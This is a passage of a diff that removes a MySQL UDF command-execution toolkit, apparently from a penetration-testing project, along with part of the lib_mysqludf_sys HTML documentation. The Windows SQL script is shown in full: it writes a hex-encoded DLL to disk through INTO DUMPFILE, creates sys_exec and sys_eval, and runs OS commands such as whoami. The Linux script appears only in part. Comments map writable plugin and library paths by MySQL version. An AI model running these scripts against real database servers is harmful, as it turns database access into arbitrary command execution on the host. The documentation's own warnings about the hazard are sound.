--- Export the hexadecimal encoded UDF to a binary file on the file system
--- 
--- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
--- 
--- From MySQL 5.1 and 6.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. The file 
---      must be located in the plugin directory. This directory is given
---      by the value of the plugin_dir system variable.
--- 
--- Note that /TODO/plugin DOES NOT
--- exist by default so it is NOT possible to save the SO in the proper
--- folder where MySQL server looks for SOs.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
--- 
--- The SO can be only in /TODO
--- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 5.1 >= 5.1.19
--- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 6.0
---
--- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
--- 
--- From MySQL 4.1 and 5.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. As of MySQL
---      M.m.m, the file must be located in the plugin directory. This
---      directory is given by the value of the plugin_dir system variable.
---      If the value of plugin_dir is empty, the behavior that is used
---      before M.m.m applies: The file must be located in a directory
---      that is searched by your system's dynamic linker.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
--- 
--- The SO can be in either /lib, /usr/lib or one of the paths specified in
--- /etc/ld.so.conf file, none of these paths are writable by mysql user by
--- default (tested on MySQL 5.0.67 with NO plugin_dir set in my.cnf
--- configuration file, which is the default setting)
--- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
-SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
--- 
--- Notes:
--- If the library file already exists, the user mysql does not have access
--- to overwrite it
--- The following enumerates the MySQL data directory
--- SELECT @@datadir
--- The followings will save into /var/lib/mysql/. It is not a valid PATH
--- where MySQL looks for SO
--- SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.so';
--- The following will save into /var/lib/mysql/mysql where 'mysql' is the
--- database name where it is connected. It is not a valid PATH where MySQL
--- looks for SO
--- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql
--- The following would save into / (Permission denied)
--- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.so';
-
-
--- Create two functions from the binary UDF file
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-
-
--- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_mysqludf_sys.txt'); -- -rw-rw---- 1 mysql    mysql
-SELECT sys_eval('cat /tmp/lib_mysqludf_sys.txt ; id');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0

extra/mysqludfsys/command_execution/windows.sql

@@ -1,128 +0,0 @@
--- Notes:
--- 
--- The DLL compiled using MySQL 5.1.30 C libraries works also on MySQL
--- 5.0.67 and MySQL 4.1.22
--- 
--- DLL compiled using MySQL 5.1.30 C libraries
--- lib_mysqludf_sys.dll: 9216 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_mysqludf_sys.dll: 6656 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- Little hack to compress the dynamic-linked library:
--- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
---   * Remember to compile it under Visual C++ 2008 with the
---     'Configuration' set as 'Release'
--- * Use upx (http://upx.sourceforge.net) over the DLL:
---   * upx -9 library.dll -o library_upx.dll
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
--- Insert the hexadecimal encoded UDF in the table
--- 
--- DLL compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000ad137127e9721f74e9721f74e9721f74e00a8c74eb721f74e00a8a74e8721f74e00a9c74e7721f74e00a9b74eb721f742a7d4274ea721f74e9721e74c0721f74e00a9674e8721f74e00a8d74e8721f74e00a8e74e8721f7452696368e9721f7400000000000000000000000000000000504500004c010300ce2e8e490000000000000000e00002210b010900001000000010000000600000507c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020040010000100000100000000010000010000000000000100000007c830000b8010000b4820000c800000000800000b402000000000000000000000000000000000000348500001000000000000000000000000000000000000000000000000000000000000000000000001c7e00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000800000e0555058310000000000100000007000000010000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000140000000000000000000000000000400000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e303300555058210d090209285e83bd2629a7f017550000480c000000240000260000eb);
-UPDATE udftest SET data=CONCAT(data,0xffcbffff8b442408833800741956578b7c2414b90c00be000010e8f3a566a56edd92ff5fb0015ec332c0c3cc2f0c2ab907fbeddbcf26111c8bf8288b4c24182ca45fc7011e16f7cf0eac5e2ecc5f0175128b4004676430f76e750a2c04c6010155710a1db2d8f3113ca4723f8b484df7efbe021152ff15968083c40485c075084514c365dffeff8bc8568d71018a114184d275f98b54142bce890a4019bb6dba7f4c39026b74186d07b0df4b06688b419974158db6ae9d9d88f3fdc7b61100230c5d37f6df85048b108d44110250899859108d893c19a16b1990173c0611b05b4a68935fe70f464085ed767732740a890aff254aa0c31f6fdb42fb53568b745b1d78734602088b46f6eddb2fd18d5c39010a525157e8300c108b5617d6de65fb02c60407974e5104219d1c76fb36c95342d2c4185357220300ad6cae843f005f5e995bc34f9099c309830c20af0b03a8c35dc242dc0081ec10305bd7f85ba102200033c489842c0d8b0620dcdc373f8c2424538b9c241c07556a01db2038360214893d515397f0fcc7de6dd76863cc5033ff14948bd8538d4c24287063edae3251895c421688debe712b6c435355904c8d5001084084c9cb63bf5d2bc22e8d2c3b55563b848bf054dde6842f528d043eb48c24511334db70d8634f528bfd4d20c4b38b5ebf6d4678105d53189c803eb3c67436c6443b04fbee3eff0063eb038d);
-UPDATE udftest SET data=CONCAT(data,0x490068fc6c0d3f777b5f8901205e5bd8e633cc7e0375bceee17481c401c31418f4935f0f0fecad221bc602011e3b0d2275c60cfff602f3c3e90807318bff5668805fb778ffdd7e56c07c5959a3062358045485f67505dbb07be133c040748326004908ff270929098e36d6fde8c70424063b0b5923d2efddbffdff558bec51510a39450c750e39056b107e3cff7337deb51bb37d0cb50910488b096957897c6cdd770a23480f85d47d641718ec797677db6d5135202c893d50bb1e50eb184af0c1febba705f43bc7741768e803a8306a0057aedbdeb02ed63ae7eb07c72c013ca12feddeddf04c6a025e9d096a1f920aa6eb3caa10bcae7deffd04b4c7051f281aa0e027fdfbbeb3075cf120b004ac1b9a59893573a576e32b085939b2f26973dfeebdfb34393d155c741c68062809dc430dd8f65ae1ff751034252316fff1acb919be54ee01dc0801a1db76367b6378d665fc00dfdb0fd4ac3dc944fc83f80266d26dec1b1b595bffa0584b7031fb0e376daf45d70f8487c7195413a5bbb6401e8b141810897d563fb6f5edef043bc87251833f6cf36a74390774e92d3cdbdaff372620f8108907b9f8b8bd599b5615441b474df86bdf1adf900c394d1003d00874b4890902886db76d0c1a0860eba7f60c3d881163564d442e38200bdb5758064c32fc3f5079811d8e4390c9c2e96a1068cd7de37712d8d0d88bd2f28b5d08);
-UPDATE udftest SET data=CONCAT(data,0x1c548597ddede433c95cfc897d2008fc3bf15abfdb5a8c393a4417e4f906ea3bf07405db16defd83fe02752ea152dc3bc1749e565fd03b7066e1865ee4000393113bd983fbf1d2141680120ab22735bb61ebfe642464205750135e436cb60e002f52d2061137ecafd153f76a0375434f34871df66c032168742e2c257febe3ad81851b71ec3409aae050516468854be5ac1065e8f62fb65ddb70fad2feff001907032ae4a4ae3dee070b1dc396ec16ff3bf07885d3246a1b5419de5da07d54550c0d05f8595d38b4a1dc8a22e928035f2120e6e6e6cd43051c891518891d14893569b6efe610893d0c668c1838060d2c666996661d0805042558fbee96002d7ffc9c8f14309556ed9f3fdb240704288d4508348b85e0fca05d3b1b63aa7095011c1920c6d8d6b12413180958c0091cb32c9fbb6b608985d8320a04dc57e01bc3031834687edf8f7d9af1ec596af75010e00a20833dd83bac7d2000f923685b1b7c4f9fc0244928c9c380401ef292223b2e5f6a144a13001531e9b190aaf8a29cc6e107bf7359eb676a08a904598fedd61d921b27355934e0f5f31d6e85bf03e4507f4b7c8cad6d5f506efe1cdc142cd6e2c4582a5b09e01b14f46393e525db08dfdc6c0bfe73130ab9d94e1e43f7d81bc0fa36edde0359485d1656b807c8be0457e946c75f503bc6730f8b0753025083c7b3f21c567afe72f13025d0d0f68dd8);
-UPDATE udftest SET data=CONCAT(data,0x14cc632f08b84d5a287f57bac466b374045262413c03c18138501bfcfb974575ef33d2b90b011c48180f94b0c29a6209895d7f3fd748b65b81df31c80fb74114a20571063357c5c6d20de908180b76de7db5ffffdf8a0c3bf972098b580803d93bfb720a4283c0283bd672e86a1c0ed933d94e4f6afe9d17705c30d00635640cfc5083c3ad31ccec0823316033c56a7c86d277f064a31a892a46096877843e2c49f0d2094c7574559734cb645f2d1350198c083b41b8f05b2d24c1e81ff709e00183bbedd40a034f170059948be5ebd84e6a969701ca3da3c0fab216ec14972fbb3191b111bacc1e540540fcb8a491444ca312aa10dc9d5c87b1095f14c3a45cb4c7acfbef5400d75cb6d9968e6c038d2be0fafcc11a68cef13ca8fc8a039b0403710dc395707018679651481473e2e3ddcdd86903786851d70ab142efe19c56a30e68f885225b7cf892bf4ee640bb25eea0397866760d85c3255aa39f0a358e04eb60ca78116bed935d388b7598920bae0c32b640f007080c9dfed66e672710b4f4330c113bf77507be4fe0b768ef59eb0b85f30a95c1e0100bf0a1f4b147c200f7d607045e5f5bb43f1919191b5005585c60811d1919646ca4000004c84305038700feff50a1172f4e6f20617267756d656e7473ddffffdf096c6c6f77656420287564663a206c69625f6d7973716c0d5f3f32f7b773085f696e666f293918);
-UPDATE udftest SET data=CONCAT(data,0x20766572777fdbfe73696f6e20302e01331f45787065637447657861eddb6f6f076c79201a65207374723f672074791b806d6d6b7572617121722bb065013b7477911f3f1f30f7968672206e4148436f756cdbb6636f246e6f74c463611320186d27a204766e79af660048b5ffffe66e201712c0015253445360a91de01b43b243bdf182720ea1bdf958d103c502633a5c4476476e6efb6edb8a539674b0735c41646d0769bed6fe7f6b938e2e57324b335354454e5550444106336d7bfbf665736b16705c7368c9655c762675be23a1b9ff5f6370705f70726f6af83e6ccb3e65ff5c52656c65617365182e706462c97c2716c8351bc707d0674d259b0ff50707069d92c3bad303e727cc08e3e84ed8810fd81f0a6b037f56a82090209e2b1210008d4516c1beb119bf44ff003400301855ff01162100e9b03c53505c100103c0bf00c7456e7669726f6edbbb2fdb7f5661726961626c6541184743757272145072ecf640fe6f636573734964546805616413d61a001f5469636ba1150dbd01d0fe51756572795003c36d616ef6de5aac37160e184469735937ffcbdf7e4c6962726a7943616c6c73497344656275676765db63ae9572685c96556e684064626f6f6f3164457846707469a146696c4adb52b6c219b4125417c9da0640a0611e11b65bdbbe49906c0c6b409d6d7087656bcd35e747517f77555122b6bb65091b);
-UPDATE udftest SET data=CONCAT(data,0x5c537973186d0bafbbd0ee2b41737365094c69ddeef634405f686974396d5f2e5fdffedaf6616d73670878110b646a753a5f666469fbb0f6bb760d5f4370705863b9b65f63721b05ec076164035f686f6f6b4bb800b6f62f636a835f1c75017c01a55f1d735ec16dce0a1f0a6c2164ad58b0adf02a17096e75131346982c0f652f5f3dd65cdbda723456fe6d1c187b0af67db1b7035f706f52296e1064687b2f80ef756c5e6d75a61bdcd696252cb3066ed633b8ed19d82508661167efbd83db5a9ce4790835c7b73773ad32c06e4d0fd76f737bcd950d75667216232e00ffffff1f19274b254920211c2f63183427310c0917251217136517090705160cbffdffff1e080a0b160918181505061b050c10060717062105110f061421110b93efffdb082b2205070d111d0d18532d4838060007d9fead950848330a090b0c0510051616f76fff760e0b34150b18160d3d0542b605121e14066932c7dae67f110c0e1d4d0517230d0c24082400f0a2410be2ff042804f0280104e008041cca0fab7f43d64c010500ce2e8e4938e000642160f902210b01090e6612f6bdc972121710090b021ed27cb3c905070360045bf6deef32f61e40012a0207069fb9dc062703b7013c230f40e7a6cc6c4fb000500227ec40565dc0771cd9d0214207926e59002fac2e746c36d8e66578741a0c900eb74260ddd287602e72647661ab08fb6b);
-UPDATE udftest SET data=CONCAT(data,0x0e5bc20a1302402e2649d374dffe032730021c0bd6b84dc04f737235ebb0d10860df731e4f4dc920cdcd5e4f980150223e72fb4d421b242412a052445300000000000000000900ff0000000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92a0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b472000001f35083c708ff96f0720000958a074708c074dc89f95748f2ae55ff96f472000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef87200008dbe00f0ffffbb0010000050546a045357ffd58d870f02000080207f8060287f585054);
-UPDATE udftest SET data=CONCAT(data,0x505357ffd558618d4424806a0039c475fa83ec80e9f998ffff00000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300010c02200100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x0000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000056020000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d);
-UPDATE udftest SET data=CONCAT(data,0x6963726f736f66742e564339302e435254222076657273696f6e3d22392e302e32313032322e38222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e504100000000000000000000000010830000f08200000000000000000000000000001d83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004b45524e454c33322e444c4c004d5356435239302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000ca2e8e49000000003a840000010000000f0000000f000000a4830000e08300001c840000301000004012000000100000501200004012000010120000f01100004012000010120000a010000040120000601000009011000070110000e01000004f84000065840000828400009d840000a6840000b6840000c4840000cd840000);
-UPDATE udftest SET data=CONCAT(data,0xdd840000eb840000f3840000028500000f850000178500002685000000000100020003000400050006000700080009000a000b000c000d000e006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e6974000000700000100000005d3c583e5c3e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-
-
--- Export the hexadecimal encoded UDF to a binary file on the file system
--- 
--- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
--- 
--- From MySQL 5.1 and 6.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. The file 
---      must be located in the plugin directory. This directory is given
---      by the value of the plugin_dir system variable.
--- 
--- The DLL must be in can be in C:\Program Files\MySQL\MySQL Server M.m\lib\plugin
--- 
--- Note that C:\Program Files\MySQL\MySQL Server M.m\lib\plugin DOES NOT
--- exist by default so it is NOT possible to save the DLL in the proper
--- folder where MySQL server looks for DLLs.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
--- 
--- The DLL can be only in C:\Program Files\MySQL\MySQL Server M.n\lib\plugin
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 5.1 >= 5.1.19
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 6.0/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 6.0
--- 
--- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
--- 
--- From MySQL 4.1 and 5.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. As of MySQL
---      M.m.m, the file must be located in the plugin directory. This
---      directory is given by the value of the plugin_dir system variable.
---      If the value of plugin_dir is empty, the behavior that is used
---      before M.m.m applies: The file must be located in a directory
---      that is searched by your system's dynamic linker.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
--- 
--- The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,
--- C:\WINDOWS\system32, @@basedir\bin or @@datadir (tested on MySQL 4.1.22
--- and MySQL 5.0.67 with NO plugin_dir set in my.ini configuration file,
--- which is the default setting)
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 4.1/data/lib_mysqludf_sys.dll'; -- On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.0/data/lib_mysqludf_sys.dll'; -- On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/data/lib_mysqludf_sys.dll'; -- On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
--- 
--- Notes:
--- If the library file already exists, the user SYSTEM does not have access
--- to overwrite it
--- The following enumerates the MySQL data directory
--- SELECT @@datadir
--- The followings will save into @@datadir. It is a valid PATH where MySQL
--- looks for DLL
-SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.dll';
--- The followings will save into @@datadir\mysql where 'mysql' is the
--- database name where it is connected. It is not a valid PATH where MySQL
--- looks for DLL
--- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.dll';
--- SELECT data FROM udftest INTO DUMPFILE '\lib_mysqludf_sys.dll';
--- The following will save into C:\. It is not a valid PATH where MySQL
--- looks for DLL
--- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.dll';
-
-
--- Create two functions from the binary UDF file
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-
-
--- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_mysqludf_sys.txt'); -- %TEMP% path is C:\WINDOWS\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0

extra/mysqludfsys/lib_mysqludf_sys/doc/lib_mysqludf_sys.html

@@ -1,278 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<link rel="stylesheet" type="text/css" href="../mysqludf.css"/>
-<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
-<title>lib_mysqludf_sys - A library of MySQL UDFs for working with the environment in which MySQL runs</title>
-</head>
-<body>
-	<div>
-		<a href="../index.html">Top</a>
-	|	<a href="../mysql_udf_repository_libraries.html">Up</a>
-	</div>
-	<h1>lib_mysqludf_sys</h1>
-	<div>
-		<a href="lib_mysqludf_sys.html">Documentation</a>
-	|	<a href="lib_mysqludf_sys.so">Binary</a>
-	|	<a href="lib_mysqludf_sys.sql">Installation</a>
-	|	<a href="lib_mysqludf_sys.c">Source</a>
-	|	<a href="lib_mysqludf_sys_0.0.2.tar.gz">tar.gz</a>
-	</div>
-	<p>
-		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
-	</p>
-	<ol>
-		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
-		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
-		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
-	</ol>
-	<p>
-		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
-	</p>
-	
-
-	<a name="sys_eval"></a><h2>sys_eval</h2>
-	<p>
-		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_eval(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			Whatever output the command pushed to the standard output stream.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_eval;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-
-	<a name="sys_exec"></a><h2>sys_exec</h2>
-	<p>
-		<code>sys_exec</code> takes one command string argument and executes it.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_exec(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			An (integer) exit code returned by the executed process.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_exec;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
